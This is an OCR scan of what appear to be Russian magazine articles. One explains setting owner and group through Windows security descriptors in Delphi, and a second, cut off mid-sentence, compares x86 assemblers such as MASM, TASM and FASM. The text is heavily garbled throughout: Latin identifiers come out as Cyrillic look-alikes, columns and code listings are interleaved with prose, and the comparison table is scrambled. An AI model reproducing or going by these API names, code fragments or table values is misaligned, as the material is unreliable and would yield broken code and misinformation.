РЗесигіІуАШіЬиІез = л ТЗесигііуАигіЬиіез; 



О Атрибуты безопасности 

Начнем рассмотрение темы с самого 
конца, а именно — с функции создания 
файла или директории. У обеих функций 
есть одинаковый параметр — указатель 
на структуру ЗЕСЕ)ПІТУ_АТТПІВЕ)ТЕЗ. У 
функции СгеаіеЕіІе этот указатель четвер- 
тый по счету, ау СгеаіеОігесіогу — второй. 
Как я уже сказал, в большинстве случаев 
это поле просто игнорируют, но давайте 
посмотрим, как его можно корректно за- 
полнить. 

Что это за структура? Она определяет атри- 
буты безопасности и состоит всего из трех 
полей: 



не интересует и выходит за рамки этой ста- 
тьи, поэтому в примере, который мы будем 
рассматривать, установим это значение в 
іаізе. 

Самое интересное — это второй параметр, 
накоторый следует обратить особое внима- 
ние. Это указатель на дескриптор безопас- 
ности, в действительности ничего страшно- 
го собой не представляющий. 



_ЗЕСЫРІТУ_АТТПІВІЛЕЗ = гесогсі 
пЬепдіЬ: ОѴѴОРЮ; 



ІрЗесигііуОезсгіріог: Роіпіег; 



ЫпЬегііНапсІІе: ВООЬ; 



Первое поле определяет размер струк- 
туры. Подобные поля можно встретить в 
большинстве ѴѴіпАРІ-структур. Второе поле 
— указатель на дескриптор безопасности. 
Третий параметр — булевое значение, ко- 
торое определяет, может ли полученный 
указатель наследоваться дочерними про- 
цессами. Наследование дескрипторов нас 



О Дескриптор безопасности 

Для каждого объекта ОС создает дескрип- 
тор безопасности, по которому определя- 
ется права доступа к объекту, его владе- 
лец, группа, а также списки ЗАСЬ (Зузіет 



ииЯк 



шжт 



? ІФЛЕНОВ МИХАИЛ АКА НОВРІРІсС 
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> Информация по 5Ю. Здесь же можно увидеть список 
предопределенных идентификаторов 




Ассезз СопігоІ І_ізі) и ЭАСІ_ (Эізсгеііопагу 
Ассезз СопІгоІ І_ізІ). Мы рассматриваем 
программирование, поэтому сделаем упор 
на рассмотрение самих функций. Если 
тебя интересует теория безопасности ОС 
ѴѴіпбоѵѵз, то следует почитать книжку из се- 
рии для админов. Я думаю, там должна быть 
освещена эта тема. 

Итак, давай посмотрим, что такое дескрип- 



ргосебиге ТРогт 1 . Виііоп 1 СІіск(ЗепсІег: 

ТОЬіесІ); 

ѵаг 

зесигіІуАДгіЬиІез: ТЗесигіІуАІІгіЬиІез; 
зесигіІуЭезсгірІог: ТЗесигііуЭезсгірІог; 
зісІІ_епдіН, зісІІ_епд{ІЮотаіп: СагбіпаІ; 
зібТуре: ЗЮ_І\ІАМЕ_ЕІЗЕ; 
зібѴаІие: РЗЮ; 
ботаіп:РСНаг; 

Ьедіп 

// Обнуляем длину буферов, чтобы 
//определить корректный размер 
зісНепдіИ := 0; 
зісНепдІІ'Юоппаіп := 0; 

// Первый вызов завершится ошибкой, но 
// вернет размер данных 
[_оокирАссоип!І\Іате(піІ, 'ІІепоѵ 1 , піі, 
зісНепдгИ, піі, зісІІ_епдІІЮотаіп, зібТуре); 



тор с точки зрения программирования. На 
самом деле, это структура, которая имеет 
следующий вид: 

РЗесигііуОезсгіріог = Л ТЗесигііуОе5Сгіріог; 
_ЗЕСІІРІТѴ_ОЕЗСРІРТОР = гесогсі 
Реѵізіоп: Вуіе; 

ЗЬгІ : Вуіе; 

Соп!гоІ:ЗЕСиВІТУ_ОЕЗСВІРТОВ_СОМТВОи 



зісІІ_епд{ІЮоппаіп, зібТуре)=ІаІзе) ІНіеп 
ехіі; 

// Инициализация дескриптора 
ІпШаІІ 2 еЗесигіІуОезсгірІог(@зесигі 1 уОезсгірІог, 
ЗЕСиВІТУ_ЭЕЗСРІРТОВ_РіЕѴІЗІОІ\І); 

//Устанавливаем полученный ЗЮ 
// владельцу и группе 

ЗеіЗесигіІуЭезсгірІогОѵѵпег(@ 

зесигіІуЭезсгірІог, 

зібѴаІие, Іаізе); 

ЗеіЗесигіІуЭе5сгірІогОгоир(@ 

зесигіІуЭезсгірІог, 
піі, Ігие); 

зесигіІуАІІгіЬиІез.пЕепдІІі := 5ІгеоІ( 
зесигіІуАІІгіЬиІез); 

зесигіІуАІІгіЬиІез.ІрЗесигіІуЭезсгірІог : = 
@зесип1уЭезспр1ог; 
зесигі{уАДгіЬиІез.ЬІпИегііНапсІІе:=ІаІзе; 



Оѵѵпег: РЗЮ; 

Огоир: РЗЮ; 

ЗасІ: РАСІ_; 

ОасІ: РАСІ_; 
епсі; 

В файле помощи эта структура описана 
только общими словами. Из чего она состо- 
ит, можно определить только по заголовоч- 
ному файлу ѵѵіпсіоѵѵз. раз. 

Давай рассмотрим, что представляютсобой 
эти поля. Это позволитнам лучше понять де- 
скриптор и его работу. 

Ееѵігіоп — ревизия. Этот параметр должен 
быть равен единице, а лучше использо- 
вать константу ЗЕСІІВІТѴ_ЭЕЗСВІРТОВ_ 
РЕѴІЗЮІМ. На одном из сайтов (не россий- 
ских, потому что в рунете я нормального 
описания этой темы не видел) утвержда- 
ется, что можно указывать еще константу 
ЗЕСиВІТУДЭЕЗСВІРТОР_РЕѴІЗІОІ\І1— мол, 
она предоставляет доступ к новым возмож- 
ностям. Уверяю тебя, что это полный бред, 
потому что обе константы в файле ѵѵіпсіоѵѵз. 
раз равны 1 , то есть идентичны. 

ЗЬгІ — этот параметр не используется и 
должен быть равен нулю (предназначен 
только для выравнивания). 

СопЪ-оІ — это поле имеет тип данных ѴѴогб и 
содержит флаги. 

Оѵпег — идентификатор безопасности ЗЮ 
владельца. 

Сгоир — идентификатор безопасности ЗЮ 
группы. 

ЗАсІ- указатель на5АСІ_; 

ОАсІ - указатель на ОАСІ_; 



СОЗДАНИЕ ОБЪЕКТОВ С ЯВНЫМ ЗАДАНИЕМ 
ВЛАДЕЛЬЦА И ГРУППЫ 



// Выделяем память для идентификатора 
// имени и домена 
зібѴаІие := АІІосМет(5ІсІІ_епдіІ"і); 
ботаіп := АІІосМет(зісІІ_епдіШотаіп); 

// На этот раз мы определим ЗЮ 
II (І_оокирАссоипІІ\Іате(піІ, 'ІІепоѵ', 
зібѴаІие, зісІІ_епдіН, ботаіп, 
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// Создаем файл на основе своего 
// дескриптора безопасности 
СгеаІеРіІе('е:\ІезихГ, ѲЕІ\ІЕЯІС_АІ_І_, 0, 
©зесигіІуАПгіЬіЛез, СЯЕАТЕ_АІ_ѴѴАУЗ, 
РІЕЕ_РЕАѲ_ВАСКІІР_ЗЕМАІ\ІТІСЗ, 0); 



О Работа с дескриптором 

Несмотря на то, что дескриптор безопас- 
ности легко описать в виде структуры, ра- 
ботать с ним напрямую не рекомендуется. 
Наверное, поэтому его не описывают в фай- 
ле справки. Почему нежелателен прямой 
доступ к полям? Дело в том, что дескриптор 






> В файле помощи информация по дескриптору безопасности очень > Незаменимый источник информации МЗЭЫ 
скудная 
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может хранить данные непосредственно, а 
может просто содержать указатель на дан- 
ные. 

Вместо прямого доступа необходимо ис- 
пользовать специализированные функции. 
Этих функций предостаточно, но мы оста- 
новимся на трех из них: инициализация, 
установка владельца объекта и установка 
группы. Да, данной структуре необходима 
инициализация, ведь она может хранить 
указатели на данные, а любой указатель 
требует выделения памяти. 

Для инициализации дескриптора безопас- 
ности используем ѴѴіпАРІ-функцию 
іпШаІігеЗесигіІуЭезсгірІог, которая выгля- 
дит следующим образом: 

Шпсііоп ІпіІіаГі2Ѳ$есигіІу0езсгірІог( 
рЗесигіІуОезсгірІог: РЗесигіІуОезсгірІог; 
сІѵѵРеѵізіоп: ОѴѴОРЮ 
): ВООІ_; зісісаіі; 



Тут у нас два параметра: указатель на де- 
скриптор безопасности, который нужно 
инициализировать, и номер ревизии. Как 
мы уже выяснили, ревизия должна быть 
равна константе ЗЕСІІРІТѴ_ОЕЗСВІРТОВ_ 
ЯЕѴІЗІОІМ. 

Чтобы установить владельца, используется 
функция ЗеіЗесигііуЭезсгіріогОѵѵпег, кото- 
рая выглядит следующим образом: 

Іитсіюп ЗеіЗесигііуОезсгіріогОѵѵпег( 
рЗесигііуОезсгіріог: РЗесигііуОезсгіріог; 
рОѵѵпег: РЗЮ; 

ЬОѵѵпеЮе^аиІІесІ: ВООІ_ 

): ВООЦ; зИсаІІ; 

ТУТ ТРИ ПАРАМЕТРА: 

• дескриптор, владельца объекта которого 
нужно изменить; 

• указатель на ЗЮ пользователя, которого 
мы хотим установить в качестве владельца; 



• нужно ли использовать владельца по 
умолчанию. Если этот параметр равен {гие, 
то владельца назначит ОС в соответствии 
со своими правилами. А правило простое: 
создатель становится владельцем. 

Для установки группы используем функцию 
ЗеіЗесигіІуЭезсгіріогСігоир, которая выгля- 
дит так: 

1 : ипсііопЗеіЗесигііуОезсгіріогОгоир( 
рЗесигііуОезсгіріог: РЗесигііуОезсгіріог; 
рОгоир: РЗЮ; 

ЬѲгоирОеІаиІІесІ: ВООІ_ 

): ВООі; зібсаіі; 

Функция очень похожа на установку вла- 
дельца. Тут у нас опять три параметра, кото- 
рые имеют схожее с функцией ЗеіЗесигііуЭ 
езсгіріогОѵѵпег назначение: 

• дескриптор, группу объекта которого нуж- 
но изменить; 
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> Для примера создадим банальную форму с одной кнопкой 



> Представление идентификатора безопасности 



• указатель на ЗЮ группы, которую мы хотим 
установить в качестве владельца; 

• нужно ли использовать группу по умолча- 
нию, то есть понадеяться на ОС. 

□ 810 

Списки доступа ЗАСІ_ и ЭАСІ_ пока опустим и 
не будем с ними заморачиваться, так как это 
тема отдельной статьи. Сейчас нас интересу- 
ют владелец и группа, но, чтобы ихустановить, 
необходимо знать соответствующий ЗЮ. Да, 
мы всегда можем использовать значение по 
умолчанию, которое предоставляет ОС, но оп- 
ределить ЗЮ нетакуж и сложно. Для этого нуж- 
навсегооднафункция — І_оокирАссоипіІ\Іате, 
которая по имени пользователя возвращает 
идентификатор безопасности ЗЮ. 

В общем виде функция выглядит следующим 
образом: 

^ипсііоп ЦоокирАссоип!Мате( 

ІрЗузіетЫате, 

ІрАссоипШате: РСГіаг; 

ЗісІ: РЗЮ; 

ѵагсЬЗісІ: йѴѴОРЮ; 

Ре^егепсесЮотаіпЫате: РСГіаг; 
ѵаг сЬРе^егепсесЮотаіпМате: ОѴѴОРО; 
ѵаг реОзе: 5І0_І\ІАМЕ_ІІ5Е 
): ВООЕ; зібсаІІ; 

Давай рассмотрим параметры этой функции: 
ІрЗугіетМате — имя системы. Если этот 
параметр нулевой, то мы ищем локального 
пользователя, если нужен ЗЮ удаленного 
пользователя, то необходимо указать здесь 
имя этой машины; 

ІрАссоипіІЧате — имя пользователя, иденти- 
фикатор которого нам нужен; 

ЗісІ — указатель на память, куда будет запи- 
сан результат; 

сЬЗісІ — длина буфера, которую мы выдели- 
ли для параметра ЗісІ, то есть для хранения 
результирующего идентификатора; 

РеТ'егепсесІ&оппаіпМаппе — имя домена; 
сЬРеТ‘егепсеіі&оппаіпМаппе — длина буфера 
ВеіегепсесЮотаіпЫате; 



реііге — переменная типаепит, которая опре- 
деляет тип учетной записи. Здесь может быть 
одно из следующих значений: 

• ЗігіТуреІігег — пользовательский ЗЮ; 

• ЗісІТуреСгоир — ЗЮ группы; 

• ЗігіТуреСотаіп — ЗЮ доменной учетной за- 
писи; 

• ЗіііТуреАІіаг — псевдоним; 

• ЗіііТуреСеІеіесІАссоипі — удаленная учетная 
запись; 

• ЗіііТуреІпѵаІііі — некорректный тип; 

• ЗіііТуреІіпкпоѵп — тип неизвестен; 
•ЗіЛуреСотриіег — идентификатор компью- 
тера. 

□ Что такое 810? 

Что собой представляет ЗЮ, хорошо иллюст- 
рирует заголовочный файл ѵѵіпсіоѵѵз.раз. За- 
пускаем поиск по трем магическим буквам (нет, 
не по тем буквам, которые пишутся на заборе, 
а по ЗЮ) и натыкаемся на табличку, которую ты 
можешь увидеть где-то рядом с этим текстом. 
Нетрудно догадаться, что на самом то деле 
ЗЮ — это структура, которая состоит из: 
ЗиЬАиіЬогііуСоипі — количество записей 
ЗиЬАиіМогіІу; 

Реѵігіоп — версия, в ней используются только 
четыре бита, остальные зарезервированы; 
Иепііі'іег АиіЬогііу — структура, которая хра- 
нит идентификатор ЗЮ; 

ЗиЬАиіЬогііу — массив относительных иден- 
тификаторов; 

Структура ІсІепШіегАіЛІіопІу имеет следующий 
вид: 

_ЗЮ_ЮЕІ\ІТІЕІЕР_АІЯНОРіІТѴ § гесогб 
Ѵаіие: аггау[0..5] сЧ Вуіе; 

И 

Банальный массив из пяти байт. 

Прямая работа с ЗЮ нежелательна. Для 
манипулирования этой структурой в ѴѴіпАРІ 
есть все необходимые функции — лучше 
использовать их. Но это уже отдельная ис- 
тория, а я и так уже не укладываюсь во вре- 
менные и объемные рамки. 



□ Определение 8Ю 

Обрати внимание, что функции І_оокир- 
АссоипіЫате, которую мы только что рас- 
смотрели, необходимо передать указатель 
на память для хранения идентификатора ЗЮ 
и указать размер. Проблема в том , что нет чет- 
ко определенного размера идентификатора. 
Сколько же тогда памяти выделять для хране- 
ния результата? 

Это легко определить. Достаточно вызвать 
функцию І_оокирАссоипіІ\Іате, указав в 
качестве парметров ссылки на буфер для 
хранения ЗЮ, и ноль — в качестве разме- 
ра буфера. В результате функция вернет 
ошибку и сообщит, что недостаточно па- 
мяти в буфере, через параметры сЬЗісІ и 
сЬВеіегепсесЮотаіпЫате вернет нам кор- 
ректные значения необходимых буферов. 
Теперь мы знаем все необходимое. 

□ Пример 

Теперь посмотрим, как можно использовать 
все вышесказанное на практике. Для этого 
я создал банальную форму с одной только 
кнопкой, по нажатию которой необходимо 
написать код из листинга 1. Код снабжен 
комментариями, а все используемые фун- 
кции мы уже подробно рассмотрели, поэто- 
му с их пониманием не должно возникнуть 
проблем. 

Данный пример создает файл, а, чтобы 
создать файл с использованием дескрип- 
тора безопасности, можно заменить 
последнюю строку с вызовом функции 
СгеаіеРіІе на: 

СгеаІеОігесІогу('с:\ОігесІогупате\ 

©зесигіІуАШіЬиІез); 

□ Итого 

Тема безопасности ѴѴіпсІоѵѵз и работы с ее 
списками и идентификаторами очень ин- 
тересная, и, возможно, мы еще вернемся к 
этой теме в ближайшее время и расскажем 
тебе что-то новое. На этом могу только от- 
кланяться. Удачного кодинга! НЕ 
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ПРОБЛЕМА ВЫБОРА «ЕДИНСТВЕННОГО ПРАВИЛЬНОГО» АССЕМБЛЕРНОГО ТРАНСЛЯТОРА МУЧАЕТ НЕ 
ЮЩИХ, НО И ПРОФЕССИОНАЛЬНЫХ ПРОГРАММИСТОВ. У КАЖДОГО ПРОДУКТА ЕСТЬ СВОЯ КОГОРТА 
СПОР О ПРЕИМУЩЕСТВАХ/НЕДОСТАТКАХ РИСКУЕТ ПРЕВРАТИТЬСЯ В СВЯЩЕННЫЕ ВОЙНЫ С ВЫНѲ 
НА ФОРУМАХ ТАКИЕ ДИСКУССИИ ЛУЧШЕ НЕ РАЗВОДИТЬ И ВЕЩАТЬ В ОДНОСТОРОННЕМ ПОРЯДКЕ, 
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РИЕВ, ЗНАЧИМОСТЬ КОТОРЫХ КАЖДЫЙ ДОЛЖЕН 01 



ЬКО НАЧИНА- 

онников, и 

ЕЛ ПОГИБШИХ. 
СОБСТВЕННО, 
ПЕКТРУКРИТЕ- 



□ ОСНОВОПОЛАГАЮЩИЕ 
КРИТЕРИИ 

Существует ряд критериев, существенных 
для всех категорий программистов. Начнем с 
генерации отладочной информации, без кото- 
рой отладка программы сложнее, чем «НеІІо, 
ѵѵогб», превращается в настоящую пытку. Но 
если формат отладочной информации — это 
задний двор транслятора, то формат выход- 
ных файлов — это его лицо. Непосвященные 
только пожмут плечами. Какой там формат? 
Обыкновенный оЬі, из которого с помощью 
линк ера можно изготовить все, что угодно: 
от ехе до сІІІ. На самом деле, «обыкновенных» 
объектных файлов в природе не бывает. Есть 
опт! (в редакциях от Місгозо!! и ІВМ), со!!, еі!, 
аоиі и куча разной экзотики в стиле аз86, гсі!, 



іеее и т.д. Также заслуживает внимания воз- 
можность «сквозной» генерации двоичных 
файлов, не требующая помощи со стороны 
линкера. А некоторые ассемблеры (например, 
ЕАЗМ) даже позволяют «вручную» генери- 
ровать исполняемые файлы и динамические 
библиотеки различных форматов, полностью 
контролируя процесс их создания и заполняя 
ключевые поля по своему усмотрению. Впро- 
чем, программы, целиком написанные на ас- 
семблере, — это либо вирусы, либо демки, 
либо учебные, либо обычный садомазохизм. 
На ассемблере чаще пишутся лишь системно- 
зависимые компоненты или модули, критич- 
ные к быстродействию, которые затем линку- 
ются к основному проекту, и если ассемблер 
генерируеттолько от!, акомпилятор — со!!, то 



возникает проблема сборки «разнокалибер- 
ных» форматов воедино. Мне известен только 
один линкер, умеющий это делать, — иііпк от 
Юрия Харона, он же обеспечивают нехилые 
возможности по сборке файлов «вручную», 
так что выбор конкретного ассемблерного 
транслятора целиком лежит на совести (и ком- 
петенции) программиста. Но все-таки лучше, 
чтобы и ассемблер, и компилятор генерирова- 
ли одинаковые форматы объектных файлов. 
Другойнемаловажныйкритерий — количество 
поддерживаемых процессорных архитектур, 
которых в линейке х86 набралось уже больше 
десятка. Кстати, ни один из трансляторов не 
поддерживает набор команд х86-процессо- 
ров в полном объеме. Например, на МАЗМ'е 
невозможно написать )тр 0007Гі:00000000Гі, 
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БИТВА ТРАНСЛЯТОРОВ 



СВОДНЫЕ ХАРАКТЕРИСТИКИ РАЗНЫХ АССЕМБЛЕРОВ 



ІКРИТЕРИЙ 


МАЗМ 


ТАЗМ 


РАЗМ 


ІЧАЗМ 


УАЗМ 




ЦЕНА 


бесплатный 


— 


бесплатный 


бесплатный 


бесплатный 




ОТКРЫТОСТЬ 


закрытый 


закрытый 


открытый 


открытый 


открытый 




ВЛАДЕЛЕЦ 


МІСГОЗОІІ 


Вогіапб 


Тотазг 


Огузгіаг 


Соттипііу 


4 


ПОПУЛЯРНОСТЬ 


огромная 


низкая 


высокая 


умеренная 


умеренная 


4 


МА8М-С0ВМЕСТИМ. 


:-) 


хорошая 


— 


низкая 


низкая 


АРХИТЕКТУРЫ 


х86 16/32,х86-64 


х86 16/32 


х86 1 6/32,х86-64 


х86 16/32 


х86 16/32,х86-64 




8ЕЕИПР0Ч. 


поддерживает 


не поддерживает 


поддерживает 


поддерживает 


поддерживает 




ПЛАТФОРМЫ 


ООЗ.ѴѴІЫ 


ООЗ.ѴѴІЫ 


боз,ѵѵіп,Ііпих,Ьзб 


боз,ѵѵіп,Ііпих,Ьзб 


боз,ѵѵіп,Ііпих,Ьзб 




ОТЛАДОЧНАЯ ИНТ. 


СобеѴіеѵѵ, РОВ 


Вогіапб 


- 


Вогіапб, ЗТАВЗ, ОѴѴАРР2 


Ьогіапб, собеѵіеѵѵ, ЗТАВЗ, ОѴѴАРР2 


ВЫХОДНЫЕ ТАЙЛЫ 


соіі, тз оті 


тз оті, ІВМ оті, РИаг І_ар 


Ьіп,гп 2 , ре, соіі, еіі 


Ып, аоиі, аоиіЬ, соіі, еіі, аз86, оЬ], ѵѵіп32, гбі, іеее 


Ып, соіі, еіі 





4 

4 



поэтому приходится прибегать к различным 
ухищрениям: либо реализовать команду че- 
рез БЕЗ, что очень неудобно, либо заталкивать 
в стек сегмент/смещение, а потом делать геіі, 
но это длинно, и к тому же воздействует на 
стек, которого у нас может и не быть. 



О МАЗМ 

Продукт жизнедеятельности ранней компа- 
нии Місгозоіі, которой тот был нужен для со- 
здания МЗЮОЗ, а позднее и для ѴѴіпбоѵѵз 9х/ 
І\ІТ. После выхода версии 6.13 продукт на 
некоторое время тормознул в развитии, но 
потом здравый смысл взял верх, и последняя 
версия (на момент написания этих строк — 
6.13.8204) поддерживает уникод, все ЗЗЕ/ 
ЗЗЕІІ/ЗЕЕІІІ-расширения, объявляемые двумя 
директивами .686/.ХММ, а также архитектуру 
АІѴЮ х86-64. Платформа ІпіеІ ІА64 не подде- 
рживается, но Місгозоіі поставляет ІпіеІ-ас- 
семблер ІАЗ.ЕХЕ. 

Аббревиатура МАЗМ расшифровывается от- 
нюдь не как Місгозоіі АззетЫег, а как Масго 
АззетЫег, то есть Ассемблер с поддержкой 
макросов, покрывающих своими возмож- 
ностями широкий круг задач: повторение 
однотипных операций с параметризацией 
(шаблоны), циклические макросы, условное 
ассемблирование и т.д., по сравнению с кото- 
рым препроцессор языка Си выглядит жалкой 
подделкой. Имеется даже зачаточная подде- 
ржка основных парадигм ООП, впрочем, так и 
не получившая большого распространения, 
поскольку ассемблер и ООП концептуально 
несовместимы. Многие пишут даже без мак- 
росов на чистом ассемблере, считая свой путь 
идеологически наиболее правильным. Но о 
вкусах не спорят. 

Сначала МАЗМ распространялся в виде само- 
стоятельного (и притом весьма дорогостояще- 
го) пакета, но позже он был включен в состав 
ООК, которое вплоть до ѴѴіпбоѵѵз 2000 ООК 
раздавалось бесплатно, а сейчас доступно 
только подписчикам МЗБЫ. Впрочем, впол- 
не полноценное ООК (с ассемблером) для 
ѴѴіпбоѵѵз Зегѵег 2003 входит в КегпеІ-Мобе 
Огіѵег Ргатеѵѵогк, а сам транслятор МАЗМ'а 
еще и в ѴізиаІ Зіибіо Ехргезз, которая бесплат- 
на. Стив Хатчессон собрал последние версии 
транслятора МАЗМ'а, линкер от Місгозоіі, 
включаемые файлы, библиотеки, обширную 



документацию, статьи разных авторов, пос- 
вященные ассемблерам, и даже простенькую 
ЮЕ в один дистрибутив, известный как «пакет 
Хатча» (Ниісб), бесплатно раздаваемый всем 
желающим на вполне лицензионной основе. 
Так что это не хак, а вполне удобный комплект 
инструментов для программирования под 
ѴѴіпбоѵѵз на ассемблере. 

МАЗМ'у посвящено множество книг, что упро- 
щает процесс обучения, а в сети можно найти 
кучу исходных текстов ассемблерных про- 
грамм и библиотек, освобождающих програм- 
миста от необходимости изобретать велоси- 
пед. Также МАЗМ является выходным языком 
для многих дизассемблеров (Зоигсег, ЮА Рго). 
Все это делает МАЗМ транслятором номером 
один в программировании под ѴѴіпіеІ. 
Поддерживаются двавыходныхформата: 1 6/32 
Місгозоіі ОМЕ и (1 6)/32/64 СОРЕ, что позволяет 
транслировать 16/32-разрядные программы 
под МЗЮОЗ, работающие в реальном и за- 
щищенном режиме, 16-разрядные приложе- 
ния и драйвера для ѴѴіпбоѵѵз 3.x, 32-разряные 
приложения и драйвера для ѴѴіпбоѵѵз 9х/І\ІТ, а 
также 64-разрядные приложения и драйвера 
для ѴѴіпбоѵѵз І\ІТ 64-Ьіі Ебіііоп. Для создания би- 
нарных файлов потребуется линкер, который 
умеет это делать (например, иііпк от Юрия Ха- 
рона). Кстати говоря, последние версии штат- 
ного Місгозоіі Ыпкег'а, входящее в ЗБК и ООК, 
утратили способность собирать 16-разрядные 
файлы под МЗ-ООЗ/ѴѴіпбоѵѵз 3.x, поэтому при- 
ходится возвращаться к старой версии, кото- 
рая лежит в папке ЫТООК\ѵѵіп_те\Ьіп1 6. 

МАЗМ генерирует отладочную информацию 
в формате СобеѴіеѵѵ, которую Місгозоіі Ыпкег 
может преобразовывать в РОВ-формат, хоть 
и не документированный, но поддерживае- 
мый библиотекой бЬдііеІр.бІІ, позволяющей 
сторонним разработчикам «переваривать» 
отладочную информацию, поэтому файлы, 
оттранслированные МАЗМ'ом, можно отлажи- 
вать в Зоіі-Ісе, дизассемблировать в ЮА Рго и 
прочих продуктах подобного типа. 

Г лавныйнедостатокМАЗМ'а — егожуткая «ба- 
гистность». Стоит только открыть Кпоѵѵіебде 
Вазе, посмотреть на список официально 
подтвержденных багов и... ужаснуться! Как 
только после этого на МАЗМ'е вообще можно 
программировать?! Особенно много ошибок 
встречается в штатной библиотеке. Вот толь- 



ко несколько примеров: бѵѵіоа и аіобѵѵ_ех не 
понимаютзнакаи по скорости оченьтормозят, 
хотя в документации написано: «А бідіі зрееб 
азсіі бесітаі зігіпд іо ОѴѴОРО сопѵегзіоп Тог 
арріісаііопз іііаі гециіге Ыдб зрееб зігеатіпд 
оі сопѵегзіоп баіа»; исРіпб не находит в стро- 
ке подстроку, если длина подстроки равна 
одному символу; функции ВМНВіпзеагсИ и 
ЗВМВіпЗеагсб реализованы с ошибками; 
некоторые функции обрушивают программу 
(если передать изіг2бѵѵ строку длиннее пяти 
байт — программа падает). 

Другой минус — отсутствие поддержки не- 
которых инструкций и режимов адресации 
процессора, например, невозможно сделать 
)тр Таг зедюіізеі, апопыткасоздания смешан- 
ного 16/32-разрядного кода — это настоящий 
кошмар, который приходится разгребать ру- 
ками и всячески извращаться, преодолевая 
сопротивление «менталитета» транслятора. 
Наконец, МАЗМ — типичный коммерческий 
продукт с закрытыми исходными текстами, 
судьба которых покрыта мраком. Місгозоіі 
интенсивно продвигает высокоуровневое 
программирование, отказываясь от ассемб- 
лера везде, где это только возможно, поэтому 
не исключено, что через несколько лет МАЗМ 
прекратит свое существование. . . 

Тем не менее, несмотря на все эти недостатки, 
МАЗМ остается самым популярным профес- 
сиональным транслятором ассемблера при 
программировании под ѴѴіпбоѵѵз І\ІТ, хотя раз- 
работчикам приходится плеваться и материть- 
ся, но реальных альтернатив ему нет. 

ОТА8М 

Самый популярный транслятор ассемблера 
времен МЗЮОЗ, созданный фирмой Вогіапб, 
полностью совместимый с МАЗМ'ом, вплоть 
до версий 6.x, и поддерживающий свой собс- 
твенный режим ЮЕАІ_ с большим количеством 
улучшений и расширений. 

Удобство программирования, скромные сис- 
темныетребования и высокая скоростьтранс- 
ляцииобеспечивалиТАЗМ'улидерствонапро- 
тяжении всего существования МЗЮОЗ (буква 
«Т» означаетТигЬо). Но с появлением ѴѴіпбоѵѵз 
популярность ТАЗМ'а стала таять буквально 
на глазах. Не сумев или не захотев добиться 
совместимости с заголовочными файлами и 
библиотеками, входящими в комплект ЗБК/ 
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ЭЭК, фирма ВогІапсІ решила поставлять свой 
собственный порт, причем далеко не идеаль- 
ный. К тому же штатный линкер !ІіпкДІіпк32 не 
поддерживает возможности создания драй- 
веров, а формат выходных файлов (МісгозоЙ 
ОМР, ІВМ ОМР, РРаг І_ар) не поддерживается 
линкером от МісгозоЙ. В довершении ко всему 
формат отладочной информации не совмес- 
тим с СобеѴіеѵѵ и реально поддерживается 
только ТигЬоЭеЬиддег'ом и зой-ісе. 

И хотя эти проблемы разрешимы, возможность 
низкоуровневого ассемблерного программи- 
рования (без включаемых файлов и макросов) 
осталась там же, где и была. Несовместимость 
форматов компенсируется наличием конвер- 
торов, но преимущества режима ЮЕАІ_ над 
стандартным синтаксисом МАЗМ'а день ото 
дня казались все менее и менее значительны- 
ми, ряды поклонников редели, и в конце концов 
проект загнулся. Последней версией трансля- 
тора стал ТАЗМ 5.0, поддерживающий коман- 
ды вплоть до 80486 процессора. Отдельно был 
выпущен патч, обновляющий ТАЗМ до версии 
5.3 и поднимающий его вплоть до Репііит ММХ, 
однако команды Репііит II такие, например, как 
ЗѴЗЕІЧТЕЯ до сих не работают. Поддержка уни- 
кода тоже отсутствует. 

В настоящее время ВогІапсІ прекратила рас- 
пространение своего ассемблера, и достать 
его можно только в магазинах, торгующих 
старыми СЭ-ВОМ, или у какого-нибудь кол- 
лекционера. Пацан по кличке !!Е выпустил 
пакет ТАЗМ 5+, включающий в себя трансля- 
тор, линкер, библиотекарь, какое-то подобие 
документации, несколько заголовочных фай- 
лов под ѴѴіпсІоѵѵз и пару демонстрационных 
примеров. Когда будешь искать это добро, 
не перепутай его с ТАЗМ32 фирмы Зциак 
ѴаІІеу ЗоЙѵѵаге — это совершенно независи- 
мый кроссассемблер, ориентированный на 
процессоры 6502,6800/6801/68НС1 1 , 6805, 
ТМ332010, ТМ3320С25, ТМ87000, 8048, 

8051 ,8080/8085, 280, 8096/8001 96КС. 

Короче, ТАЗМ — это труп. Причем вполне 
конкретный. Но для разработки прикладных 
приложений под ѴѴіпсІоѵѵз 16/32 и МЗ-ЭОЗ он 
все-таки подходит, тем более, если есть опыт 



работы с ним и некоторые собственные на- 
работки (библиотеки, макросы), с которыми 
жалко расставаться, а конвертировать под 
МАЗМ — весьма проблематично. Возможно, 
тебе понравится бесплатный Багу АззетЫег 
(автор — Половников Степан), совместимый 
с режимом ЮЕАІ_ ТАЗМ и поддерживающий 
команды из наборов ММХ, ЗЗЕ, ЗЗЕІІ, ЗЗЕІІІ, 
ЗЭІ\Іоѵѵ!Рго. 

ОРА5М 

Писать о культовых проектах, не затронув 
чувства верующих и сохранив при этом здоро- 
вую долю скептицизма и объективизма не так- 
то просто, особенно если ты сам являешься 
апологетом веры. РАЗМ (расшифровывается 
как Ріа! АззетЫег — Ассемблер плоского ре- 
жима) — это крайне необычный транслятор с 
экзотичными возможностями, которых все мы 
давно (и безуспешно!) ждали от крупных про- 
изводителей, но те были слишком далеки от 
практического программирования и пытались 
сформировать новые потребности (напри- 
мер, путем введения поддержки ООП), вместо 
того чтобы удовлетворять те, что есть. 

Так продолжалось до тех пор, пока Томаш 
Гриштар (Тотазг Огузгіаг) — аспирант 
Ягеллонского университета в Кракове 
— не задумал написать свою собственную 
ось, названную «Титаном» и представля- 
ющую некоторое подобие 003-системы 
для защищенного режима. Перебрав не- 
сколько ассемблерных трансляторов, 
но так и не обнаружив среди них подходящего, 
Томаш пошел на довольно амбициозный шаг, 
решив разработать необходимый инстру- 
ментарий самостоятельно. Это произошло в 
1999-03-23, 14:24:33 (дата создания первого 
файла), и уже к началу мая 1999 года появи- 
лась версия, способная транслировать сама 
себя (РАЗМ написан на РАЗМ'е). Операцион- 
ная система в результате одной случайной 
катастрофы пала смертью храбрых, а вот ис- 
ходные тексты РАЗМ'а остались, и с тех пор он 
продолжает активно развиваться. 

Что же такое РАЗМ? Это ассемблер с пре- 
дельно упрощенным синтаксисом (никаких 



оТСзеТов и прочих захламляющих листинг ди- 
ректив), полной поддержкой всех процессор- 
ных команд (втом числе и )тр 0007:00000000), 
качественным кодогенератором, мощным 
макропроцессором и гибкой системой уп- 
равления форматов выходных файлов. РАЗМ 
распространяется в исходных текстах на 
бесплатной основе, и к настоящему момен- 
